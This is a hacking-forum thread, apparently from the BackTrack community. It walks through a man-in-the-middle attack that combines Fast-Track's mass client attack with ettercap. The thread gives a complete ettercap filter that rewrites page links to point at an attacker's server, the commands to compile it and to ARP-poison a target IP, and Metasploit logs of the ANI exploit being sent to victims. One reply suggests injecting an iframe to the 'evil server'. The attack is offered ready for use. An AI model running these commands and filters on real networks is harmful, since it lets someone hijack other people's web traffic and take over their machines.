Pwnage. lol. I got a shell and you didn't haha. Just kidding. Thanks for teaching me how to do this, I really appreciate it.
fast-track mass client attck + ettercap
first start up fast-strack and run the web gui mode -g
now open a web browser to this page http://127.0.0.1:44444/metaclientCode:./fast-track.py -g
simply enter your ip address to listen on and click "launch attack"... for example ill use 192.168.1.5
you should see 3 console pop up... you can minimize them
now we need to compile our filter that we will use with ettercapyou must make sure you replace the ip addres in the filter to match yours of the server... save this as massclient.filterCode:if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("a href=", "a href=\"http://192.168.1.5\" "); replace("a href=", "a href=\"http://192.168.1.5\" "); msg("Filter Ran.\n"); }
then in a new console compile the filter with this commandCode:etterfilter massclient.filter -o massclient.ef
now start ettercap with this commandnow wait for your target to visit the evil webpage that fast-track has setup and check your sessions -l for a shellCode:ettercap -T -q -F massclient.ef -M ARP /192.168.1.2/ //
i dont take credit for this... i just took some one els tutorial and made a quick change to the filter... for more info check these links
http://www.irongeek.com/i.php?page=s...ettercapfilter
http://forums.remote-exploit.org/sho...t=12885&page=9
i think dr_green also has one but cant find it at this time
this was a quick walk threw... i hope some one finds this useful... let me know if i made mistakes... the filter is also kinda buggy but it gets the job done...
Pwnage. lol. I got a shell and you didn't haha. Just kidding. Thanks for teaching me how to do this, I really appreciate it.
A+
Network +
Security +
Linux +
Work in progress: Saving for OSCP
Currently reading:Hacking-The Art Of Exploitation.
Is there a version of this that works on metasploit instead of backtrack?
Mikee, So i guess you are using windows?
Originally Posted by BigMac
yes, is it possible to use this?
This is Backtrack Forum, not how to do things on Windows. You should use google asking the same question, you will get more success.
Or simply start using backtrack, you can do it, like most of us do.
Ok, got everything working but can't get a shell, what am I doing wrong?
stalls here:
Victim machine is definitely been pwned..[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending exploit to 192.168.1.105:1626...
[*] Started bind handler
[*] Sending ANI file to 192.168.1.105:1625...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.105:1625...
[*] Sending exploit to 192.168.1.105:1626...
[*] Sending exploit HTML to 192.168.1.105:1628...
[*] Sending HTML to 192.168.1.105:1631...
[*] Sending HTML to 192.168.1.105:1632...
[*] Sending HTML to 192.168.1.105:1633...
[*] Sending exploit to 192.168.1.105:1634...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending ANI file to 192.168.1.105:1638...lol..but it is asking to install activeX. Also, victim's are WINXP SP2, and a Vista machine, got the same output for both.
may just want to put an iframe insted hijacking ALL the links lol
just put before </body> the iframe of the evil server ;P
NOTE: mass client side will crash IE7 so beware .
coo coo
I'll pop this into Fast-Track next update, nice tutorial
its done
Got back from poker night last night after a couple beers and coded the ettercap filters into Fast-Track's Mass Client Attack, works great. Added it to the menu mode, gui, and command line. I'll push the updates on Monday. Nice job BigMac, appreciate the help on getting it to work, made it super simple for me to pop it into my code.
Screenshots attached:
http://img223.imageshack.us/img223/9709/ettercapcg2.jpg
Posting Permissions